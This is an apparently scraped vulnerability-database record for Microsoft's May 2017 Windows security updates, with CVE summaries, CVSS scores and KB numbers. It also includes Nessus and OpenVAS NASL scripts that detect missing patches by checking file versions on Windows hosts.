The remote Windows host is missing multiple security updates released on 2017/05/09. It is, therefore, affected by multiple vulnerabilities:
- An elevation of privilege vulnerability exists when Windows improperly handles objects in memory. (CVE-2017-0077)
- A denial of service vulnerability exists in Windows DNS Server if the server is configured to answer version queries. An attacker who successfully exploited this vulnerability could cause the DNS Server service to become nonresponsive. (CVE-2017-0171)
- An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. (CVE-2017-0190)
- An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)
- An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)
- An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175, CVE-2017-0220)
- An information disclosure vulnerability exists in the way some ActiveX objects are instantiated. An attacker who successfully exploited this vulnerability could gain access to protected memory contents. (CVE-2017-0242)
- An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. On systems with Windows 7 for x64-based Systems or later installed, this vulnerability can lead to denial of service. (CVE-2017-0244)
- An information disclosure vulnerability exists when the win32k component improperly provides kernel information. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-0245)
- An elevation of privilege vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. On computers with Windows 7 for x64-based systems or later installed, this vulnerability can lead to denial of service. (CVE-2017-0246)
- An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. (CVE-2017-0258)
- An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. (CVE-2017-0263)
- An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0267)
- An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0268)
- A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding. (CVE-2017-0269)
- An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0270)
- An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0271)
- A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server. (CVE-2017-0272)
- A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding. (CVE-2017-0273)
- An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0274)
- An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0275)
- An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0276)
- A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server. (CVE-2017-0277)
- A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server. (CVE-2017-0278)
- A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server. (CVE-2017-0279)
- A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding. (CVE-2017-0280)
- An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)
Plugin record:
- Title: Windows 2008 May 2017 Multiple Security Updates
- Synopsis: The remote Windows host is affected by multiple vulnerabilities.
- Plugin: SMB_NT_MS17_MAY_WIN2008.NASL (Nessus plugin ID 100063, script version 1.19)
- Published: 2017-05-09; modified: 2022-03-29
- CVSS: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
- CVSS3: 8.1 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
- Source: https://www.tenable.com/plugins/nessus/100063
- MSKB: 4018196, 4018466, 4018556, 4018821, 4018885, 4018927, 4019149, 4019204, 4019206
- IAVA: 2017-A-0148
- CISA-KNOWN-EXPLOITED: 2022/08/10, 2022/04/18
- Reporter: This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018196/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018466/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018556/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018821/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018885/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018927/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019149/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019204/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019206/title\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - KB4018196\n - KB4018466\n - KB4018556\n - KB4018821\n - KB4018885\n - KB4018927\n - KB4019149\n - KB4019204\n - KB4019206\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-05';\n\nkbs = make_list(\n \"4018196\", \n \"4018466\",\n \"4018556\",\n \"4018821\",\n \"4018885\",\n \"4018927\",\n \"4019149\",\n \"4019204\",\n \"4019206\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB4018196 Applies only to hosts having 'DNS Server' role installed\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\ndns_role_installed = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\DNS\\DisplayName\"\n);\nRegCloseKey(handle:hklm);\nclose_registry(close:TRUE);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\nif(! 
smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4018196\nif (!isnull(dns_role_installed))\n{\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"dns-server-service_31bf3856ad364e35_\", file_pat:\"^dns\\.exe$\", max_recurse:1);\n vuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19765','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018196\", session:the_session);\n}\n\n# 4018466\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"smbserver-common_31bf3856ad364e35_\", file_pat:\"^srvnet\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19673','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018466\", session:the_session);\n\n# 4018556\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"com-base-qfe-ole32_31bf3856ad364e35_\", file_pat:\"^ole32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19773','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018556\", session:the_session);\n\n# 4018821\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tdi-over-tcpip_31bf3856ad364e35_\", file_pat:\"^tdx\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19762','6.0.6002.24087'),\n 
max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018821\", session:the_session);\n\n# 4018885\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tcpip-binaries_31bf3856ad364e35_\", file_pat:\"^tcpip\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19763','6.0.6002.24087'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018885\", session:the_session);\n\n# 4018927\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"rds-datafactory-dll_31bf3856ad364e35_\", file_pat:\"^msadcf\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19770','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018927\", session:the_session);\n\n# 4019149\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"lddmcore_31bf3856ad364e35_\", file_pat:\"^dxgkrnl\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('7.0.6002.19765','7.0.6002.24089'),\n max_versions:make_list('7.0.6002.20000','7.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4019149\", session:the_session);\n\n# 4019204\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"win32k_31bf3856ad364e35_\", file_pat:\"^win32k\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19778','6.0.6002.24095'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4019204\", session:the_session);\n\n# 4019206\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"gdi32_31bf3856ad364e35_\", file_pat:\"^gdi32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19765','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n 
bulletin:bulletin,\n kb:\"4019206\", session:the_session);\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Apply the following security updates :\n\n - KB4018196\n - KB4018466\n - KB4018556\n - KB4018821\n - KB4018885\n - KB4018927\n - KB4019149\n - KB4019204\n - KB4019206", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0272", "vpr": {"risk factor": "Critical", "score": "9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-05-09T00:00:00", "vulnerabilityPublicationDate": "2017-05-09T00:00:00", "exploitableWith": ["Core Impact"]}
{"openvas": [{"lastseen": "2020-06-08T23:22:43", "description": "This host is missing a critical security\n update (monthly rollup) according to Microsoft KB4019264.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Monthly Rollup (KB4019264)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0231", "CVE-2017-0244", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0269", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0245", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-8552", "CVE-2017-0268", "CVE-2017-0242", "CVE-2017-0213", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246", "CVE-2017-0175"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811114", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811114", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Monthly Rollup (KB4019264)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811114\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0175\",\n \"CVE-2017-0190\", \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0220\",\n \"CVE-2017-0222\", \"CVE-2017-0231\", \"CVE-2017-0242\", \"CVE-2017-0244\",\n \"CVE-2017-0245\", \"CVE-2017-0246\", \"CVE-2017-0258\", \"CVE-2017-0263\",\n \"CVE-2017-0267\", \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\",\n \"CVE-2017-0271\", \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\",\n \"CVE-2017-0275\", \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\",\n \"CVE-2017-0279\", \"CVE-2017-0280\", \"CVE-2017-8552\");\n script_bugtraq_id(98121, 98114, 98097, 98110, 98298, 98102, 98103, 98111, 98127,\n 98173, 98275, 98109, 98115, 98108, 98112, 98258, 98259, 98261,\n 98263, 98264, 98265, 98260, 98274, 98266, 98267, 98268, 98270,\n 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:07:03 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Monthly Rollup (KB4019264)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update (monthly rollup) according to Microsoft KB4019264.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is 
present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This monthly rollup,\n\n - Addressed issue where applications that use msado15.dll stop working after\n installing security update 4015550.\n\n - Deprecated SHA-1 Microsoft Edge and Internet Explorer 11 for SSL/TLS Server\n Authentication.\n\n - Updated Internet Explorer 11's New Tab Page with an integrated newsfeed.\n\n - Includes security updates to Microsoft Graphics Component, Microsoft Windows\n DNS, Windows COM, Windows Server, Windows kernel, and Internet Explorer.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code or elevate user privileges, take control of the affected system,\n bypass security restrictions, conduct denial-of-service condition, gain access\n to potentially sensitive information and spoof content by tricking a user by\n redirecting the user to a specially crafted website.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019264\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp( win7:2, win7x64:2, win2008r2:2 ) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.1.7601.23775\"))\n{\n report = 'File checked: ' + sysPath + \"\\Ole32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23775\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:47:51", "description": "This host is missing a critical/important\n security update according to Microsoft KB4018466", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft SMB Multiple Vulnerabilities (KB4018466)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0280", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0269", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0268", "CVE-2017-0276"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811117", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811117", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft SMB Multiple Vulnerabilities (KB4018466)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811117\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-0267\", \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\",\n \"CVE-2017-0271\", \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\",\n \"CVE-2017-0275\", \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\",\n \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98259, 98261, 98263, 98264, 98265, 98260, 98274, 98266,\n 98267, 98268, 98270, 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:51:18 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n 
script_name(\"Microsoft SMB Multiple Vulnerabilities (KB4018466)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical/important\n security update according to Microsoft KB4018466\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the error in\n the way Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause the affected system to stop responding until it is manually\n restarted. Also successful exploitation will allow attacker to get sensitive\n data and execute arbitrary code in context of current user.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP SP2 x64\n\n - Microsoft Windows XP SP3 x86\n\n - Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n - Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4018466\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025687\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, winVista:3,\n win2008:3, winVistax64:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nif(!asVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\srv.sys\")){\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n{\n\n if(version_is_less(version:asVer, test_version:\"6.0.6002.19765\"))\n {\n Vulnerable_range = \"Less than 6.0.6002.19765\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:asVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24088\"))\n {\n Vulnerable_range = \"6.0.6002.22000 - 6.0.6002.24088\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:asVer, test_version:\"5.1.2600.7238\"))\n {\n Vulnerable_range = \"Less than 5.1.2600.7238\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n{\n if(version_is_less(version:asVer, test_version:\"5.2.3790.6051\"))\n {\n Vulnerable_range = \"Less than 5.2.3790.6051\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + asVer + '\\n' +\n 'Vulnerable 
range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:18:57", "description": "This host is missing a critical/important\n security update according to Microsoft KB4019623", "cvss3": {}, "published": "2017-06-19T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019623)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0280", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0269", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0268", "CVE-2017-0276"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811209", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811209", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019623)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
